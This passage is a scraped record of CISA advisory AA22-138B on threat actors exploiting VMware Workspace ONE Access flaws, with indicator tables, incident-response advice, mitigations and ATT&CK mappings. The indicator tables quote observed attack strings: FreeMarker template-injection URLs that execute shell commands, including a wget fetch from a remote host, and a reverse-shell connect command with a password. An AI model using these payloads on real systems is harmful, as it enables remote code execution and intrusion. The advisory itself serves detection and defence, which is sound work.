command-line history.\n * Auditing running processes.\n * Reviewing local user accounts and groups. \n * Auditing active listening ports and connections.\n\n_Table 1: Third-party IOCs for Exploitation of CVE-2022-22954 and CVE-2022-22960 _ \n_**Used around April 12\u201314, 2022 (Updated June 2, 2022)**_ \n\n\nIP Addresses \n--- \n**Indicator** | **Comment** \n`136.243.75[.]136 ` | On or around April 12, 2022, malicious cyber actors may have used this German-registered IP address to conduct the activity. However, the actors may have used the Privax HMA VPN client to conduct operations. \n**_Update June 2, 2022:_** \n`84.38.133[.]149` | A threat actor used this IP for command and control. \n`186.233.187[.]245` | This IP attempted to upload webshells. The user agent string for this IP was `Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 ` \n`212.227.198[.]95` | \n`20.232.97[.]189` | A threat actor used this IP for command and control (see Victim 1 and Victim 2 sections). \n`160.20.145[.]225` | \n`149.248.35[.]200` | \n`100.14.239[.]83` | A threat actor attempted to connect a reverse shell on the compromised server to this IP address. \n`51.79.171[.]53` | This IP address attempted to upload a webshell \n`172.94.89[.]112` | This IP address attempted to have a reverse shell on the compromised server to connect back to IP Address `100.14.239[.]83` on port 5410. \n`83.84.74[.]155 ` | \n`194.31.98[.]141` | This IP attempted to download MoneroOcean miner from Github. \n`8.45.41[.]114` | This IP ran `cat` on a number of files in `/usr/local/horizon/conf`. \n`85.203.36[.]66 ` | This IP attempted to pull down a JSP webshell from `http://84.38.133[.]149/img/icon.gif`. \n`45.72.112[.]245` | These IPs downloaded, executed, and checked a malicious bash script. \n`115.167.53[.]141` \n`191.102.179[.]197` \n`209.127.110[.]126` \n`45.72.85[.]172` \n`192.241.67[.]12` \n**Domains** \n`https://149.248.35[.]200.sslip[.]io` | \n`sslip[.]io ` | \n`https://github[.]com/kost/revsocks/releases/download` | \n**_Update End_** \n**Scanning, Exploitation Strings, and Commands Observed** \n`catalog-portal/ui/oauth/verify ` | \n \n`catalog `\n\n`portal/ui/oauth/verify?error=&deviceUdid=${\"freemarker.template.utility.Execute\"?new()(\"cat /etc/hosts\")} `\n\n| \n \n`/catalog `\n\n`portal/ui/oauth/verify?error=&deviceUdid=${\"freemarker.template.utility.Execute\"?new()(\"wget -U \"Hello 1.0\" -qO - http://[REDACTED]/one\")}`\n\n| \n`freemarker.template.utility.Execute` | \n\nSearch for this function in: \n\n`/opt/vmware/horizon/workspace/logs/greenbox_web.log`\n\n**_Update June 2, 2022:_**\n\nor `/opt/vmware/horizon/workspace/logs/greenbox_web.log*`\n\n`freemarker.template.utility.Execute` may be legitimate but could also indicate malicious shell commands. You should URL decode the logs before searching for `freemarker.template.utility.Execute`. \n \n| **_Update End_** \n`/opt/vmware/certproxy/bing/certproxyService.sh ` | Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root. \n`/horizon/scripts/exportCustomGroupUsers.sh ` | Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root. \n`/horizon/scripts/extractUserIdFromDatabase.sh ` | Check for this command being placed into the script; CVE-2022-22960 allows a user to write to it and be executed as root. \n**_Update June 2, 2022:_** \n`.tmp12865xax2 -connect 149[.]248[.]35[.]200.sslip[.]io:443 -pass OneTwoOne123!\" `(Bash) | \n**_Update End_** | \n**Files** \n \n`horizon.jsp `\n\n**_June 2, 2022 Update:_**\n\n(`jquery.jsp`)\n\n`5b0bfda04a1e0d8dcb02556dc4e56e6a` (MD 5)\n\n**_Update End_**\n\n| Found in `/usr/local/horizon/workspace/webapps/SAAS/horizon/js-lib: ` \n_**Update June 2, 2022:**_ \n`jest.jsp` | \n`74805fa847acac6adc896968421ec9e` (MD 5) | \n`dc88c5fe715b5f706f9fb92547da948a` (MD 5) | Reverse SOCKS proxy \n_**Update End**_ \n**Webshells** \n \n`jspy `\n\n_**Update June 2, 2022:**_\n\n`C509282c94b504129ac6ef168a3f08a8` (MD 5)\n\n**_Update End_**\n\n| \n \n`godzilla `\n\n**_Update June 2, 2022:_**\n\n`app.jsp`\n\n`4cd8366345ad4068feca4d417738b4bd` (MD 5)\n\n**_Update End_**\n\n| \n`tomcatjsp ` | \n \n**_Update May 25, 2022:_** see Palo Alto Networks Unit 42 [Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)](<https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/>) for additional IOCs to detect possible exploitation or compromise. Note: due to the urgency to share this information, CISA has not yet validated this content.\n\n### Incident Response\n\nIf administrators discover system compromise, CISA recommends they:\n\n 1. **Immediately isolate affected systems. **\n 2. **Collect and review relevant logs, data, and artifacts.**\n 3. **Consider soliciting support from a third-party incident response organization** to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.\n 4. **Report incidents to CISA **via CISA\u2019s 24/7 Operations Center ([report@cisa.gov](<mailto:report@cisa.gov>) or 888-282-0870).\n\n### Mitigations\n\nCISA recommends organizations update impacted VMware products to the latest version or remove impacted versions from organizational networks. CISA does not endorse alternative mitigation options. As noted in [ED 22-03 Mitigate VMware Vulnerabilities](<https://www.cisa.gov/emergency-directive-22-03>), CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. ED 22-03 directs all Federal Civilian Executive Branch agencies to enumerate all instances of impacted VMware products and deploy updates in [VMware Security Advisory VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) or to remove the affected software from the agency network until the updates can be applied.\n\n### Resources\n\n * [ED 22-03 Mitigate VMware Vulnerabilities](<https://www.cisa.gov/emergency-directive-22-03>)\n * [VMware Security Advisory VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>)\n * [VMware Security Advisory VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>)\n * **_Update May 25, 2022:_** Palo Alto Networks Unit 42 [Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)](<https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/>)\n\n### Contact Information \n\nCISA encourages recipients of this CSA to report incidents to CISA via CISA\u2019s 24/7 Operations Center ([report@cisa.gov](<mailto:report@cisa.gov>) or 888-282-0870)\n\n### References\n\n[1] [VMware Security Advisory VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>) \n[2] [Ibid](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>)\n\n**_Update June 2, 2022:_**\n\n### Appendix: Mitre Att&amp;ck TTPS\n\nThreat actors and their malware have used the TTPs in table 1 when exploiting CVE-2022-22954 and/or CVE-2022-22960 and conducting related activity. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v11/matrices/enterprise/>) framework for all referenced threat actor tactics and techniques.\n\n_Table 2: MITRE ATT&amp;CK TTPs_\n\nTactic | **Technique** \n---|--- \nResource Development [[TA0042](<https://attack.mitre.org/versions/v11/tactics/TA0042/>)] | Obtain Capabilities: Malware [[T1588.001](<https://attack.mitre.org/versions/v11/techniques/T1588/001/>)] \nExecution [[TA0002](<https://attack.mitre.org/versions/v11/tactics/TA0002/>)] | Command and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v11/techniques/T1059/>)] \nCommand and Scripting Interpreter: Unix Shell [[T1059.004](<https://attack.mitre.org/versions/v11/techniques/T1059/004/>)] \nExploitation for Client Execution [[T1203](<https://attack.mitre.org/versions/v11/techniques/T1203>)] \nPersistence [[TA0003](<https://attack.mitre.org/versions/v11/tactics/TA0003/>)] | Server Software Component: Web Shell [[T1505.003](<https://attack.mitre.org/versions/v11/techniques/T1505/003/>)] \nPrivilege Escalation [[TA0004](<https://attack.mitre.org/versions/v11/tactics/TA0004/>)] | Exploitation for Privilege Escalation [[T1068](<https://attack.mitre.org/versions/v11/techniques/T1068/>)] \nDefense Evasion [[TA0005](<https://attack.mitre.org/versions/v11/tactics/TA0005/>)] | \n\nFile and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification\n\n[[T1222.002](<https://attack.mitre.org/versions/v11/techniques/T1222/002/>)]\n\nIndicator Removal on Host [[T1070](<https://attack.mitre.org/versions/v11/techniques/T1070/>)] \n \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v11/tactics/TA0006/>)] | \n\n * OS Credential Dumping: /etc/passwd and /etc/shadow\n * [[T1003.008](<https://attack.mitre.org/versions/v11/techniques/T1003/008/>)] \nCollection [[TA0009](<https://attack.mitre.org/versions/v11/tactics/TA0009/>)] | \n\nArchive Collected Data [[T1560](<https://attack.mitre.org/versions/v11/techniques/T1560/>)] \n \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v11/tactics/TA0011/>)] | Application Layer Protocol: Web Protocols [[T1071.001](<https://attack.mitre.org/versions/v11/techniques/T1071/001/>)] \nEncrypted Channel: Symmetric Cryptography [[T1573.001](<https://attack.mitre.org/versions/v11/techniques/T1573/001/>)] \nProxy [[T1090](<https://attack.mitre.org/versions/v11/techniques/T1090/>)] \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v11/techniques/T1105/>)] \nExfiltration [[TA0004](<https://attack.mitre.org/versions/v11/tactics/TA0004/>)] | \n \n**_Update End_**\n\n### References\n\n[[1] VMware Security Advisory VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>)\n\n[[2] Ibid](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>)\n\n### Revisions\n\nInitial Version: May 18, 2022|May 25, 2022: Added Industry Resource|June 2, 2022: Added Detection Signatures, IOCs, and TTPs\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T12:00:00", "type": "ics", "title": "Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-06-02T12:00:00", "id": "AA22-138B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-05-19T11:27:36", "description": "CISA has issued [Emergency Directive (ED) 22-03](<https://www.cisa.gov/emergency-directive-22-03>) and released a [Cybersecurity Advisory (CSA)](<http://www.cisa.gov/uscert/ncas/alerts/aa22-138b>) in response to active and expected exploitation of multiple vulnerabilities in the following VMware products: VMware Workspace ONE Access (Access), VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, vRealize Suite Lifecycle Manager.\n\nThe CSA, [AA22-138B: Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control](<http://www.cisa.gov/uscert/ncas/alerts/aa22-138b>), provides indicators of compromise and detection signatures from CISA as well as trusted third parties to assist administrators with detecting and responding to active exploitation of CVE-2022-22954 and CVE-2022-22960. Malicious cyber actors were able to reverse engineer the vendor updates to develop an exploit within 48 hours and quickly began exploiting these disclosed vulnerabilities in unpatched devices. Based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit CVE-2022-22972 and CVE-2022-22973, which were disclosed by VMware on May 18, 2022. \n\n[ED 22-03](<https://www.cisa.gov/emergency-directive-22-03>) directs all Federal Civilian Executive Branch agencies to enumerate all instances of affected VMware products and either deploy updates provided in [VMware Security Advisory VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>), released May 18, 2022, or remove those instances from agency networks.\n\nCISA strongly encourages all organizations to deploy updates provided in [VMware Security Advisory VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) or remove those instances from networks. CISA also encourages organizations with affected VMware products that are accessible from the internet to assume compromise and initiate threat hunting activities using the detection methods provided in [the CSA](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138b>). If potential compromise is detected, administrators should apply the incident response recommendations included in [the CSA](<http://www.cisa.gov/uscert/ncas/alerts/aa22-138b>).\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/05/18/cisa-issues-emergency-directive-and-releases-advisory-related>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-18T00:00:00", "type": "cisa", "title": "CISA Issues Emergency Directive and Releases Advisory Related to VMware Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-18T00:00:00", "id": "CISA:07834FF4B4F96A051DF8DCF65DA68FF2", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/05/18/cisa-issues-emergency-directive-and-releases-advisory-related", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}